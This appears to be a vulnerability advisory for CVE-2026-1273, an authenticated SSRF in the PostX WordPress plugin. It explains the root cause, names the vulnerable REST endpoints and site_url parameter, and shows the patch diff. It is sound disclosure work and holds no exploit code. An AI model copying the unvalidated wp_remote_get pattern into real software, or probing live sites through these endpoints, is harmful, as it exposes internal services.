Atomic Edge analysis of CVE-2026-1273:
The vulnerability is a Server-Side Request Forgery (SSRF) in the PostX WordPress plugin. The root cause resides in the `starter_dummy_post()` and `starter_import_content()` methods within the `ultimate-post/classes/Importer.php` file. These methods handle REST API requests at `/ultp/v3/starter_dummy_post/` and `/ultp/v3/starter_import_content/`. The vulnerable code uses `wp_remote_get()` to fetch data from a user-supplied URL via the `site_url` parameter without sufficient validation or restriction. This allows an authenticated administrator to force the server to make HTTP requests to arbitrary internal or external locations. The patch replaces `wp_remote_get()` with `wp_safe_remote_post()` in the `starter_dummy_post()` method and modifies the request logic in `starter_import_content()`. The `wp_safe_remote_post()` function restricts requests to a set of allowed ports and protocols, mitigating SSRF. The patch also adds a nonce verification mechanism via a new AJAX handler `ultp_get_nonce_callback()` in `ultimate-post/classes/Blocks.php`. This change enforces CSRF protection for the import functionality. Exploitation requires administrator-level access. A successful attack enables interaction with internal services, potentially leading to information disclosure, internal network enumeration, or remote code execution if combined with other vulnerabilities.
Published : March 18, 2026
CVE-2026-1273: PostX <= 5.0.8 – Authenticated (Administrator+) Server-Side Request Forgery via REST API Endpoints (ultimate-post)
CVE ID
CVE-2026-1273
Plugin
ultimate-post
Severity
High
(CVSS 7.2)
CWE
918
Vulnerable Version
5.0.8
Patched Version
5.0.9
Disclosed
March 2, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/ultimate-post/addons/builder/blocks/Post_Featured_Image.php
+++ b/ultimate-post/addons/builder/blocks/Post_Featured_Image.php
@@ -73,7 +73,7 @@
$post_video = get_post_meta( get_the_ID(), '__builder_feature_video', true );
$caption = get_post_meta( get_the_ID(), '__builder_feature_caption', true );
- $embeded = $post_video ? ultimate_post()->get_embeded_video( $post_video, false, true, false, true, true, false, true, array( 'width' => array( 'width' => $attr['videoWidth'] ) ) ) : '';
+ $embeded = $post_video ? ultimate_post()->get_embeded_video( $post_video, false, true, false, true, true, false, true, array( 'width' => array( 'width' => $attr['videoWidth'] ) ), 'from-block' ) : '';
$post_thumb_id = get_post_thumbnail_id( get_the_ID() );
$img_content = ultimate_post()->get_image( $post_thumb_id, $attr['imgCrop'], '', $attr['altText'], $attr['imgSrcset'] );
$img_caption = wp_get_attachment_caption( $post_thumb_id );
--- a/ultimate-post/classes/Blocks.php
+++ b/ultimate-post/classes/Blocks.php
@@ -38,6 +38,8 @@
add_action( 'wp_ajax_ultp_share_count', array( $this, 'ultp_share_count_callback' ) ); // share Count save .
add_action( 'wp_ajax_nopriv_ultp_share_count', array( $this, 'ultp_share_count_callback' ) ); // share Count save .
+ add_action( 'wp_ajax_ultp_get_nonce', array( $this, 'ultp_get_nonce_callback' ) ); // Nonce Generating Callback
+ add_action( 'wp_ajax_nopriv_ultp_get_nonce', array( $this, 'ultp_get_nonce_callback' ) ); // Nonce Generating Callback
}
/**
@@ -387,7 +389,7 @@
$taxonomy = isset( $_POST['taxonomy'] ) ? ultimate_post()->ultp_rest_sanitize_params( $_POST['taxonomy'] ) : '[]';
$author = isset( $_POST['author'] ) ? ultimate_post()->ultp_rest_sanitize_params( $_POST['author'] ) : false;
- $orderby = isset( $_POST['orderby'] ) ? sanitize_text_field( $_POST['orderby'] ) : 'title'; // default orderbyt title requested from support
+ $orderby = isset( $_POST['orderby'] ) ? sanitize_text_field( $_POST['orderby'] ) : ''; // default orderbyt title requested from support
$order = isset( $_POST['order'] ) ? sanitize_text_field( $_POST['order'] ) : 'DESC';
$search = isset( $_POST['search'] ) ? sanitize_text_field( $_POST['search'] ) : '';
$adv_sort = isset( $_POST['adv_sort'] ) ? sanitize_text_field( $_POST['adv_sort'] ) : '';
@@ -602,10 +604,12 @@
$value['attrs']['queryTaxValue'] = wp_json_encode( $taxonomy );
$value['attrs']['queryRelation'] = 'AND';
$value['attrs']['queryAuthor'] = $adv_filter_data['author'];
- $value['attrs']['queryOrderBy'] = $adv_filter_data['orderby'];
$value['attrs']['queryOrder'] = $adv_filter_data['order'];
$value['attrs']['querySearch'] = $adv_filter_data['search'];
$value['attrs']['queryQuick'] = $adv_filter_data['adv_sort'];
+ if ( ! empty( $adv_filter_data['orderby'] ) ) {
+ $value['attrs']['queryOrderBy'] = $adv_filter_data['orderby'];
+ }
} else {
$value['attrs']['queryTaxValue'] = wp_json_encode( array( $taxonomy ) );
}
@@ -634,7 +638,7 @@
if ( $filter_attributes['isAdv'] ) {
$filter_attributes['queryAuthor'] = $adv_filter_data['author'];
- $filter_attributes['queryOrderBy'] = $adv_filter_data['orderby'];
+ $filter_attributes['queryOrderBy'] = ! empty( $adv_filter_data['orderby'] ) ? $adv_filter_data['orderby'] : $value['attrs']['queryOrderBy'];
$filter_attributes['queryOrder'] = $adv_filter_data['order'];
$filter_attributes['querySearch'] = $adv_filter_data['search'];
$filter_attributes['queryQuick'] = $adv_filter_data['adv_sort'];
@@ -704,4 +708,20 @@
return $wraper_after;
}
+
+ /**
+ * Nonce Generation Callback
+ *
+ * @since v.5.0.6
+ *
+ * @return STRING The AJAX response.
+ */
+ public function ultp_get_nonce_callback() {
+ nocache_headers();
+ wp_send_json_success(
+ array(
+ 'nonce' => wp_create_nonce( 'ultp-nonce' ),
+ )
+ );
+ }
}
--- a/ultimate-post/classes/Functions.php
+++ b/ultimate-post/classes/Functions.php
@@ -674,10 +674,10 @@
* @return ARRAY
*/
public function get_query( $attr ) {
- $builder = isset( $attr['builder'] ) ? $attr['builder'] : '';
- $post_type = isset( $attr['queryType'] ) ? $attr['queryType'] : 'post';
- $get_post_type = isset($attr['queryPostType']) ? $attr['queryPostType'] : '';
- if($post_type != 'archiveBuilder' && !empty($get_post_type) && $post_type == 'customPostType') {
+ $builder = isset( $attr['builder'] ) ? $attr['builder'] : '';
+ $post_type = isset( $attr['queryType'] ) ? $attr['queryType'] : 'post';
+ $get_post_type = isset( $attr['queryPostType'] ) ? $attr['queryPostType'] : '';
+ if ( $post_type != 'archiveBuilder' && ! empty( $get_post_type ) && $post_type == 'customPostType' ) {
$post_type = $get_post_type;
}
@@ -850,7 +850,7 @@
$query_args = array(
'posts_per_page' => $query_number,
- 'post_type' => is_array( $post_type ) && ! empty( $post_type ) ? $post_type : ( 'archiveBuilder' == $post_type ? 'post' : ( is_string( $post_type ) ? is_array(json_decode( $post_type )) ? json_decode( $post_type ) : $post_type : $post_type ) ),
+ 'post_type' => is_array( $post_type ) && ! empty( $post_type ) ? $post_type : ( 'archiveBuilder' == $post_type ? 'post' : ( is_string( $post_type ) ? is_array( json_decode( $post_type ) ) ? json_decode( $post_type ) : $post_type : $post_type ) ),
'orderby' => isset( $attr['queryOrderBy'] ) ? $attr['queryOrderBy'] : 'date',
'order' => isset( $attr['queryOrder'] ) ? $attr['queryOrder'] : 'desc',
'paged' => $paged,
@@ -1317,8 +1317,8 @@
public function get_svg_icon( $ultp_icons = '' ) {
$svg = '';
if ( $ultp_icons ) {
- $icon = $this->svg_icon_compatibility($ultp_icons);
- $svg = $this->get_path_file_contents( ULTP_PATH . 'assets/img/iconpack/' . $icon . '.svg' );
+ $icon = $this->svg_icon_compatibility( $ultp_icons );
+ $svg = $this->get_path_file_contents( ULTP_PATH . 'assets/img/iconpack/' . $icon . '.svg' );
}
return $svg;
}
@@ -1696,9 +1696,72 @@
* @param ARRAY | string $size Size for oEmbed.
* @return STRING | false Video embed HTML or false on failure.
*/
- public function get_embeded_video( $url, $autoPlay, $loop, $mute, $playback, $preload, $poster, $inline, $size ) {
+ public function get_embeded_video( $url, $autoPlay, $loop, $mute, $playback, $preload, $poster, $inline, $size, $location = '' ) {
$vidAutoPlay = $vidloop = $vidloop = $vidmute = $vidplayback = $vidPoster = $vidInline = '';
+ $video_type = '';
+ // Determine video type
+ $video_type = 'local';
+ if ( strpos( $url, 'youtube.com' ) !== false || strpos( $url, 'youtu.be' ) !== false ) {
+ $video_type = 'youtube';
+ } elseif ( strpos( $url, 'vimeo.com' ) !== false ) {
+ $video_type = 'vimeo';
+ }
+
+ // Get poster URL
+ $poster_url = '';
+ if ( is_array( $poster ) && isset( $poster['url'] ) ) {
+ $poster_url = $poster['url'];
+ } elseif ( is_string( $poster ) ) {
+ $poster_url = $poster;
+ }
+
+ // Prepare size attributes
+ $width = is_array( $size ) && isset( $size['width'] ) ? $size['width'] : 560;
+ $height = is_array( $size ) && isset( $size['height'] ) ? $size['height'] : 315;
+
+ $video_id = '';
+
+ if ( $url ) {
+ $regex = '/(?:youtu.be/|youtube.com/(?:embed/|v/|watch?v=|watch?.+&v=))((w|-){11})/';
+ if ( preg_match( $regex, $url, $matches ) ) {
+ $video_id = $matches[1];
+ }
+ }
+
+ // Create data attributes for lazy loading
+ $data_attrs = array(
+ 'data-video-url' => is_scalar( $url ) ? esc_attr( $url ) : '',
+ 'data-video-type' => is_scalar( $video_type ) ? esc_attr( $video_type ) : '',
+ 'data-autoplay' => ! empty( $autoPlay ) ? '1' : '0',
+ 'data-loop' => ! empty( $loop ) ? '1' : '0',
+ 'data-mute' => ! empty( $mute ) ? '1' : '0',
+ 'data-controls' => ! empty( $playback ) ? '1' : '0',
+ 'data-preload' => is_scalar( $preload ) ? esc_attr( $preload ) : '',
+ 'data-poster' => is_scalar( $poster_url ) ? esc_attr( $poster_url ) : '',
+ 'data-playsinline' => ! empty( $inline ) ? '1' : '0',
+ 'data-width' => is_scalar( $width ) ? esc_attr( $width ) : '',
+ 'data-height' => is_scalar( $height ) ? esc_attr( $height ) : '',
+ 'data-video-id' => is_scalar( $video_id ) ? esc_attr( $video_id ) : '',
+ );
+
+ $data_string = implode(
+ ' ',
+ array_map(
+ function ( $key, $value ) {
+ return $key . '="' . $value . '"';
+ },
+ array_keys( $data_attrs ),
+ $data_attrs
+ )
+ );
+
+ $html = '<div class="ultp-video-wrapper ultp-embaded-video"' . $data_string . '></div>';
+
+ if ( $location == '' ) {
+ return $html;
+ }
+
if ( $autoPlay ) {
$vidAutoPlay = 'autoplay';
}
@@ -2708,230 +2771,230 @@
// Get icon aliases mapping
$icon_aliases = array(
// Arrow aliases
- 'angle_bottom_left_line' => 'arrow_down_bottom_left_solid',
- 'angle_bottom_right_line' => 'arrow_down_bottom_right_solid',
- 'angle_top_left_line' => 'arrow_up_top_left_solid',
- 'angle_top_right_line' => 'arrow_up_top_right_solid',
- 'rightFillAngle' => 'right_triangle_angle_play_arrow_forward_solid',
- 'leftAngle2' => 'arrow_left_previous_backward_chevron_line',
- 'rightAngle2' => 'arrow_right_next_forward_chevron_line',
- 'collapse_bottom_line' => 'arrow_down_dropdown_maximize_chevron_line',
- 'arrowUp2' => 'arrow_up_dropdown_minimize_chevron_line',
- 'longArrowUp2' => 'long_arrow_up_top_increase_solid',
-
+ 'angle_bottom_left_line' => 'arrow_down_bottom_left_solid',
+ 'angle_bottom_right_line' => 'arrow_down_bottom_right_solid',
+ 'angle_top_left_line' => 'arrow_up_top_left_solid',
+ 'angle_top_right_line' => 'arrow_up_top_right_solid',
+ 'rightFillAngle' => 'right_triangle_angle_play_arrow_forward_solid',
+ 'leftAngle2' => 'arrow_left_previous_backward_chevron_line',
+ 'rightAngle2' => 'arrow_right_next_forward_chevron_line',
+ 'collapse_bottom_line' => 'arrow_down_dropdown_maximize_chevron_line',
+ 'arrowUp2' => 'arrow_up_dropdown_minimize_chevron_line',
+ 'longArrowUp2' => 'long_arrow_up_top_increase_solid',
+
// Circle arrow aliases
- 'arrow_left_circle_line' => 'arrow_left_backward_circle_line',
+ 'arrow_left_circle_line' => 'arrow_left_backward_circle_line',
'arrow_bottom_circle_line' => 'arrow_down_bottom_downward_circle_line',
- 'arrow_right_circle_line' => 'arrow_right_forward_circle_line',
- 'arrow_top_circle_line' => 'arrow_up_top_upward_circle_line',
-
+ 'arrow_right_circle_line' => 'arrow_right_forward_circle_line',
+ 'arrow_top_circle_line' => 'arrow_up_top_upward_circle_line',
+
// Close/Cross aliases
- 'close_circle_line' => 'cross_close_x_minimize_circle_line',
- 'close_line' => 'cross_x_close_minimize_line',
-
+ 'close_circle_line' => 'cross_close_x_minimize_circle_line',
+ 'close_line' => 'cross_x_close_minimize_line',
+
// Direction aliases
- 'arrow_down_line' => 'arrow_down_bottom_downward_line',
- 'leftArrowLg' => 'arrow_left_backward_line',
- 'rightArrowLg' => 'arrow_left_forward_line',
- 'arrow_up_line' => 'long_arrow_up_top_increase_line',
-
+ 'arrow_down_line' => 'arrow_down_bottom_downward_line',
+ 'leftArrowLg' => 'arrow_left_backward_line',
+ 'rightArrowLg' => 'arrow_left_forward_line',
+ 'arrow_up_line' => 'long_arrow_up_top_increase_line',
+
// Solid direction aliases
- 'down_solid' => 'arrow_down_bottom_downward_circle_solid',
- 'right_solid' => 'arrow_right_forward_circle_solid',
- 'left_solid' => 'arrow_left_backward_circle_solid',
- 'up_solid' => 'arrow_up_top_upward_circle_solid',
-
+ 'down_solid' => 'arrow_down_bottom_downward_circle_solid',
+ 'right_solid' => 'arrow_right_forward_circle_solid',
+ 'left_solid' => 'arrow_left_backward_circle_solid',
+ 'up_solid' => 'arrow_up_top_upward_circle_solid',
+
// Move aliases
- 'bottom_right_line' => 'arrow_move_up_right_line',
- 'bottom_left_line' => 'arrow_move_up_left_line',
- 'top_left_angle_line' => 'arrow_move_down_left_line',
- 'top_right_line' => 'arrow_move_down_right_line',
-
+ 'bottom_right_line' => 'arrow_move_up_right_line',
+ 'bottom_left_line' => 'arrow_move_up_left_line',
+ 'top_left_angle_line' => 'arrow_move_down_left_line',
+ 'top_right_line' => 'arrow_move_down_right_line',
+
// Utility aliases
- 'at_line' => 'at_a_mail_line',
- 'refresh' => 'refresh_reset_cycle_loop_infinity_line',
- 'cart_line' => 'shopping_cart_line',
- 'cart_solid' => 'add_plus_shopping_cart_solid',
- 'cog_line' => 'settings_tool_function_line',
- 'cog_solid' => 'settings_tool_function_solid',
- 'clock' => 'clock_reading_time_1_line',
- 'book' => 'book_line',
- 'download_line' => 'download_1_line',
- 'download_solid' => 'download_1_solid',
- 'downlod_bottom_solid' => 'download_1_solid',
-
+ 'at_line' => 'at_a_mail_line',
+ 'refresh' => 'refresh_reset_cycle_loop_infinity_line',
+ 'cart_line' => 'shopping_cart_line',
+ 'cart_solid' => 'add_plus_shopping_cart_solid',
+ 'cog_line' => 'settings_tool_function_line',
+ 'cog_solid' => 'settings_tool_function_solid',
+ 'clock' => 'clock_reading_time_1_line',
+ 'book' => 'book_line',
+ 'download_line' => 'download_1_line',
+ 'download_solid' => 'download_1_solid',
+ 'downlod_bottom_solid' => 'download_1_solid',
+
// Visibility aliases
- 'eye' => 'view_count_show_visible_eye_open_2_line',
- 'hidden_line' => 'hidden_hide_invisible_line',
-
+ 'eye' => 'view_count_show_visible_eye_open_2_line',
+ 'hidden_line' => 'hidden_hide_invisible_line',
+
// Location aliases
- 'home_line' => 'home_house_line',
- 'home_solid' => 'home_house_solid',
- 'location_line' => 'location_gps_map_line',
- 'location_solid' => 'location_gps_map_solid',
-
+ 'home_line' => 'home_house_line',
+ 'home_solid' => 'home_house_solid',
+ 'location_line' => 'location_gps_map_line',
+ 'location_solid' => 'location_gps_map_solid',
+
// Emotion aliases
- 'love_line' => 'heart_love_wishlist_favourite_line',
- 'love_solid' => 'heart_love_wishlist_favourite_solid',
-
+ 'love_line' => 'heart_love_wishlist_favourite_line',
+ 'love_solid' => 'heart_love_wishlist_favourite_solid',
+
// Media aliases
- 'play_line' => 'play_media_video_circle_line',
- 'videoplay' => 'right_triangle_angle_play_arrow_forward_solid',
- 'left_angle_solid' => 'left_triangle_angle_arrow_backward_solid',
-
+ 'play_line' => 'play_media_video_circle_line',
+ 'videoplay' => 'right_triangle_angle_play_arrow_forward_solid',
+ 'left_angle_solid' => 'left_triangle_angle_arrow_backward_solid',
+
// Shape aliases
- 'caretArrow' => 'caret_up_top_triangle_angle_arrow_upward_solid',
- 'rectangle_solid' => 'square_rounded_solid',
- 'triangle_solid' => 'triangle_shape_solid',
-
+ 'caretArrow' => 'caret_up_top_triangle_angle_arrow_upward_solid',
+ 'rectangle_solid' => 'square_rounded_solid',
+ 'triangle_solid' => 'triangle_shape_solid',
+
// Status aliases
- 'restriction_line' => 'restriction_no_stop_line',
- 'right_circle_line' => 'correct_save_check_circle_line',
- 'save_line' => 'correct_save_check_line',
- 'search_line' => 'search_magnify_line',
- 'search_solid' => 'search_magnify_solid',
-
+ 'restriction_line' => 'restriction_no_stop_line',
+ 'right_circle_line' => 'correct_save_check_circle_line',
+ 'save_line' => 'correct_save_check_line',
+ 'search_line' => 'search_magnify_line',
+ 'search_solid' => 'search_magnify_solid',
+
// Warning aliases
- 'notice_circle_solid' => 'warning_circle_solid',
- 'notice_solid' => 'warning_triangle_solid',
- 'warning_circle_line' => 'warning_circle_line',
- 'warning_triangle_line' => 'warning_triangle_line',
-
+ 'notice_circle_solid' => 'warning_circle_solid',
+ 'notice_solid' => 'warning_triangle_solid',
+ 'warning_circle_line' => 'warning_circle_line',
+ 'warning_triangle_line' => 'warning_triangle_line',
+
// Category aliases
- 'cat1' => 'category_file_documents_1_solid',
- 'cat2' => 'category_book_line',
- 'cat3' => 'category_file_documents_2_line',
- 'cat4' => 'category_file_documents_3_line',
- 'cat5' => 'category_file_documents_3_solid',
- 'cat6' => 'category_file_documents_4_line',
- 'cat7' => 'category_book_line',
-
+ 'cat1' => 'category_file_documents_1_solid',
+ 'cat2' => 'category_book_line',
+ 'cat3' => 'category_file_documents_2_line',
+ 'cat4' => 'category_file_documents_3_line',
+ 'cat5' => 'category_file_documents_3_solid',
+ 'cat6' => 'category_file_documents_4_line',
+ 'cat7' => 'category_book_line',
+
// Comment aliases
- 'commentCount1' => 'messege_comment_1_line',
- 'commentCount2' => 'messege_comment_3_solid',
- 'commentCount3' => 'messege_comment_3_line',
- 'commentCount4' => 'messege_comment_6_line',
- 'commentCount5' => 'messege_comment_7_line',
- 'commentCount6' => 'messege_comment_8_line',
- 'comment' => 'messege_comment_4_line',
-
+ 'commentCount1' => 'messege_comment_1_line',
+ 'commentCount2' => 'messege_comment_3_solid',
+ 'commentCount3' => 'messege_comment_3_line',
+ 'commentCount4' => 'messege_comment_6_line',
+ 'commentCount5' => 'messege_comment_7_line',
+ 'commentCount6' => 'messege_comment_8_line',
+ 'comment' => 'messege_comment_4_line',
+
// Date aliases
- 'date1' => 'calendar_date_4_line',
- 'date2' => 'calendar_date_1_solid',
- 'date3' => 'calendar_date_2_line',
- 'date4' => 'calendar_date_4_solid',
- 'date5' => 'calendar_date_3_line',
- 'calendar' => 'calendar_date_3_line',
-
+ 'date1' => 'calendar_date_4_line',
+ 'date2' => 'calendar_date_1_solid',
+ 'date3' => 'calendar_date_2_line',
+ 'date4' => 'calendar_date_4_solid',
+ 'date5' => 'calendar_date_3_line',
+ 'calendar' => 'calendar_date_3_line',
+
// Reading time aliases
- 'readingTime1' => 'clock_reading_time_3_line',
- 'readingTime2' => 'clock_reading_time_2_line',
- 'readingTime3' => 'book_reading_time_line',
- 'readingTime4' => 'clock_reading_time_1_line',
- 'readingTime5' => 'hourglass_timer_time_line',
-
+ 'readingTime1' => 'clock_reading_time_3_line',
+ 'readingTime2' => 'clock_reading_time_2_line',
+ 'readingTime3' => 'book_reading_time_line',
+ 'readingTime4' => 'clock_reading_time_1_line',
+ 'readingTime5' => 'hourglass_timer_time_line',
+
// Tag aliases
- 'tag1' => 'tag_bookmark_save_favourite_mark_discount_sale_line',
- 'tag2' => 'price_tag_label_category_sale_discount_solid',
- 'tag3' => 'price_tag_label_category_sale_discount_line',
- 'tag4' => 'price_tag_offer_sale_coupon_solid',
- 'tag5' => 'price_tag_label_category_sale_discount_line',
- 'tag6' => 'growth_increase_up_solid',
-
+ 'tag1' => 'tag_bookmark_save_favourite_mark_discount_sale_line',
+ 'tag2' => 'price_tag_label_category_sale_discount_solid',
+ 'tag3' => 'price_tag_label_category_sale_discount_line',
+ 'tag4' => 'price_tag_offer_sale_coupon_solid',
+ 'tag5' => 'price_tag_label_category_sale_discount_line',
+ 'tag6' => 'growth_increase_up_solid',
+
// View count aliases
- 'viewCount1' => 'view_count_show_visible_eye_open_1_line',
- 'viewCount2' => 'view_count_show_visible_eye_open_2_line',
- 'viewCount3' => 'view_count_show_visible_eye_open_3_line',
- 'viewCount4' => 'view_count_show_visible_eye_open_4_solid',
- 'viewCount5' => 'view_count_show_visible_eye_open_5_solid',
- 'viewCount6' => 'view_count_show_visible_eye_open_5_solid',
-
+ 'viewCount1' => 'view_count_show_visible_eye_open_1_line',
+ 'viewCount2' => 'view_count_show_visible_eye_open_2_line',
+ 'viewCount3' => 'view_count_show_visible_eye_open_3_line',
+ 'viewCount4' => 'view_count_show_visible_eye_open_4_solid',
+ 'viewCount5' => 'view_count_show_visible_eye_open_5_solid',
+ 'viewCount6' => 'view_count_show_visible_eye_open_5_solid',
+
// Author aliases
- 'author1' => 'author_user_human_1_line',
- 'author2' => 'author_user_human_4_line',
- 'author3' => 'author_user_human_4_solid',
- 'author4' => 'author_user_human_4_line',
- 'author5' => 'author_user_human_3_solid',
- 'author6' => 'author_user_human_6_line',
- 'user' => 'author_user_human_3_line',
-
+ 'author1' => 'author_user_human_1_line',
+ 'author2' => 'author_user_human_4_line',
+ 'author3' => 'author_user_human_4_solid',
+ 'author4' => 'author_user_human_4_line',
+ 'author5' => 'author_user_human_3_solid',
+ 'author6' => 'author_user_human_6_line',
+ 'user' => 'author_user_human_3_line',
+
// Device aliases
- 'desktop' => 'desktop_monitor_computer_line',
- 'laptop' => 'laptop_computer_line',
- 'tablet' => 'tablet_ipad_pad_line',
- 'mobile' => 'mobile_smartphone_phone_line',
-
+ 'desktop' => 'desktop_monitor_computer_line',
+ 'laptop' => 'laptop_computer_line',
+ 'tablet' => 'tablet_ipad_pad_line',
+ 'mobile' => 'mobile_smartphone_phone_line',
+
// Emoji aliases
- 'angry_line' => 'angry_emoji_line',
- 'angry_solid' => 'angry_emoji_solid',
- 'confused_line' => 'confused_emoji_line',
- 'confused_solid' => 'confused_emoji_solid',
- 'happy_line' => 'happy_emoji_line',
- 'happy_solid' => 'happy_emoji_solid',
- 'smile_line' => 'smile_emoji_line',
- 'smile_solid' => 'smile_emoji_solid',
-
+ 'angry_line' => 'angry_emoji_line',
+ 'angry_solid' => 'angry_emoji_solid',
+ 'confused_line' => 'confused_emoji_line',
+ 'confused_solid' => 'confused_emoji_solid',
+ 'happy_line' => 'happy_emoji_line',
+ 'happy_solid' => 'happy_emoji_solid',
+ 'smile_line' => 'smile_emoji_line',
+ 'smile_solid' => 'smile_emoji_solid',
+
// Social aliases
- 'share_line' => 'social_community_line',
- 'share' => 'share_social_solid',
- 'apple_solid' => 'apple_logo_icon_solid',
- 'android_solid' => 'android_logo_icon_solid',
- 'google_solid' => 'google_logo_icon_solid',
- 'messenger' => 'messenger_logo_icon_solid',
- 'microsoft_solid' => 'microsoft_logo_icon_solid',
- 'mail' => 'mail_email_messege_solid',
- 'facebook' => 'facebook_logo_icon_solid',
- 'twitter' => 'twitter_x_logo_icon_line',
- 'link' => 'link_chains_line',
-
+ 'share_line' => 'social_community_line',
+ 'share' => 'share_social_solid',
+ 'apple_solid' => 'apple_logo_icon_solid',
+ 'android_solid' => 'android_logo_icon_solid',
+ 'google_solid' => 'google_logo_icon_solid',
+ 'messenger' => 'messenger_logo_icon_solid',
+ 'microsoft_solid' => 'microsoft_logo_icon_solid',
+ 'mail' => 'mail_email_messege_solid',
+ 'facebook' => 'facebook_logo_icon_solid',
+ 'twitter' => 'twitter_x_logo_icon_line',
+ 'link' => 'link_chains_line',
+
// Misc aliases
- 'media_document' => 'media_document',
- 'arrowDown2' => 'arrow_down_dropdown_maximize_chevron_line',
- 'setting' => 'settings_tool_function_solid',
- 'upload_solid' => 'upload_1_solid',
+ 'media_document' => 'media_document',
+ 'arrowDown2' => 'arrow_down_dropdown_maximize_chevron_line',
+ 'setting' => 'settings_tool_function_solid',
+ 'upload_solid' => 'upload_1_solid',
// Empty aliases for missing icons (return empty string)
- 'correct_solid' => 'correct_save_check_circle_line',
- 'dot_solid' => 'dot_circle_solid',
- 'right_circle_solid' => 'correct_save_check_circle_solid',
- 'full_screen' => 'full_screen_corners_out_solid',
- 'zoom_in' => 'zoom_in_magnifying_glass_plus_line',
- 'zoom_out' => 'zoom_out_magnifying_glass_minus_line',
- 'gallery_indicator' => 'gallery_indicator_image_solid',
- 'ascending' => 'sort_ascending_order_solid',
- 'descending' => 'sort_descending_order_line',
- 'unlink' => 'unlink_link_break_line',
- 'rocket' => 'rocket_fly_boost_launch_pro_line',
- 'unlock' => 'unlocked_open_security_solid',
- 'connect' => 'plugin_connect_socket_integration_solid',
- 'leftAngle' => 'arrow_left_previous_backward_chevron_line',
- 'rightAngle' => 'right_triangle_angle_play_arrow_forward_line',
- 'plus2' => '',
- 'hamicon_1' => 'left_align_1_line',
+ 'correct_solid' => 'correct_save_check_circle_line',
+ 'dot_solid' => 'dot_circle_solid',
+ 'right_circle_solid' => 'correct_save_check_circle_solid',
+ 'full_screen' => 'full_screen_corners_out_solid',
+ 'zoom_in' => 'zoom_in_magnifying_glass_plus_line',
+ 'zoom_out' => 'zoom_out_magnifying_glass_minus_line',
+ 'gallery_indicator' => 'gallery_indicator_image_solid',
+ 'ascending' => 'sort_ascending_order_solid',
+ 'descending' => 'sort_descending_order_line',
+ 'unlink' => 'unlink_link_break_line',
+ 'rocket' => 'rocket_fly_boost_launch_pro_line',
+ 'unlock' => 'unlocked_open_security_solid',
+ 'connect' => 'plugin_connect_socket_integration_solid',
+ 'leftAngle' => 'arrow_left_previous_backward_chevron_line',
+ 'rightAngle' => 'right_triangle_angle_play_arrow_forward_line',
+ 'plus2' => '',
+ 'hamicon_1' => 'left_align_1_line',
// extra in assetsimgiconpack folder
- 'hamicon_2' => 'hemicon_2_line',
- 'hamicon_3' => 'hemicon_3_line',
- 'hamicon_4' => 'hamicon_5_line',
- 'hamicon_5' => 'hamicon_4_sloid',
- 'hamicon_6' => 'hamicon_6_line',
- 'instagram_solid' => 'instagram_logo_icon_solid',
- 'linkedin' => 'linkedin_logo_icon_solid',
- 'pause_solid' => 'pause_solid',
- 'pinterest' => 'pinterest_logo_icon_solid',
- 'reddit' => 'reddit_logo_icon_solid',
- 'skype' => 'skype_logo_icon_solid',
- 'tiktok_lite_solid' => 'tiktok_logo_icon_line',
- 'tiktok_solid' => 'tiktok_logo_icon_circle_solid',
- 'whatsapp' => 'whatsapp_logo_icon_solid',
- 'wordpress_lite_solid' => 'wordpress_logo_icon_solid',
- 'wordpress_solid' => 'wordpress_logo_icon_2_solid',
- 'wrong_solid' => 'cross_close_x_minimize_circle_solid',
- 'youtube_solid' => 'youtube_logo_icon_solid',
- 'five_star_line' => 'star_rating_line',
- 'rightAngleBold' => 'arrow_right_next_forward_chevron_line',
- 'leftAngleBold' => 'arrow_left_previous_backward_chevron_line',
- 'plus' => 'plus',
- 'reset_left_line' => 'refresh_reset_cycle_loop_infinity_line',
+ 'hamicon_2' => 'hemicon_2_line',
+ 'hamicon_3' => 'hemicon_3_line',
+ 'hamicon_4' => 'hamicon_5_line',
+ 'hamicon_5' => 'hamicon_4_sloid',
+ 'hamicon_6' => 'hamicon_6_line',
+ 'instagram_solid' => 'instagram_logo_icon_solid',
+ 'linkedin' => 'linkedin_logo_icon_solid',
+ 'pause_solid' => 'pause_solid',
+ 'pinterest' => 'pinterest_logo_icon_solid',
+ 'reddit' => 'reddit_logo_icon_solid',
+ 'skype' => 'skype_logo_icon_solid',
+ 'tiktok_lite_solid' => 'tiktok_logo_icon_line',
+ 'tiktok_solid' => 'tiktok_logo_icon_circle_solid',
+ 'whatsapp' => 'whatsapp_logo_icon_solid',
+ 'wordpress_lite_solid' => 'wordpress_logo_icon_solid',
+ 'wordpress_solid' => 'wordpress_logo_icon_2_solid',
+ 'wrong_solid' => 'cross_close_x_minimize_circle_solid',
+ 'youtube_solid' => 'youtube_logo_icon_solid',
+ 'five_star_line' => 'star_rating_line',
+ 'rightAngleBold' => 'arrow_right_next_forward_chevron_line',
+ 'leftAngleBold' => 'arrow_left_previous_backward_chevron_line',
+ 'plus' => 'plus',
+ 'reset_left_line' => 'refresh_reset_cycle_loop_infinity_line',
);
// Return resolved alias or false if not found
return isset( $icon_aliases[ $icon_name ] ) ? $icon_aliases[ $icon_name ] : $icon_name;
--- a/ultimate-post/classes/Importer.php
+++ b/ultimate-post/classes/Importer.php
@@ -203,7 +203,7 @@
);
}
- $response = wp_remote_get(
+ $response = wp_safe_remote_post(
$api_endpoint . '/wp-json/importer/site_all_posts',
array(
'method' => 'POST',
@@ -277,7 +277,7 @@
}
}
- $response = wp_remote_get(
+ $response = wp_safe_remote_post(
$api_endpoint . '/wp-json/importer/single',
array(
'method' => 'POST',
@@ -760,7 +760,7 @@
'license' => Xpo::get_lc_key(),
'ultp_ver' => ULTP_VER,
);
- $response = wp_remote_get(
+ $response = wp_safe_remote_post(
$api_endpoint . '/wp-json/importer/single',
array(
'method' => 'POST',
--- a/ultimate-post/includes/durbin/class-xpo.php
+++ b/ultimate-post/includes/durbin/class-xpo.php
@@ -372,7 +372,7 @@
*/
public static function install_and_active_plugin( $name ) {
$to_r = array( 'done' => true );
- $plugin_slug = $name;
+ $plugin_slug = '';
switch ( $name ) {
case 'post_x':
$plugin_slug = 'ultimate-post';
--- a/ultimate-post/ultimate-post.php
+++ b/ultimate-post/ultimate-post.php
@@ -3,7 +3,7 @@
/**
* Plugin Name: PostX
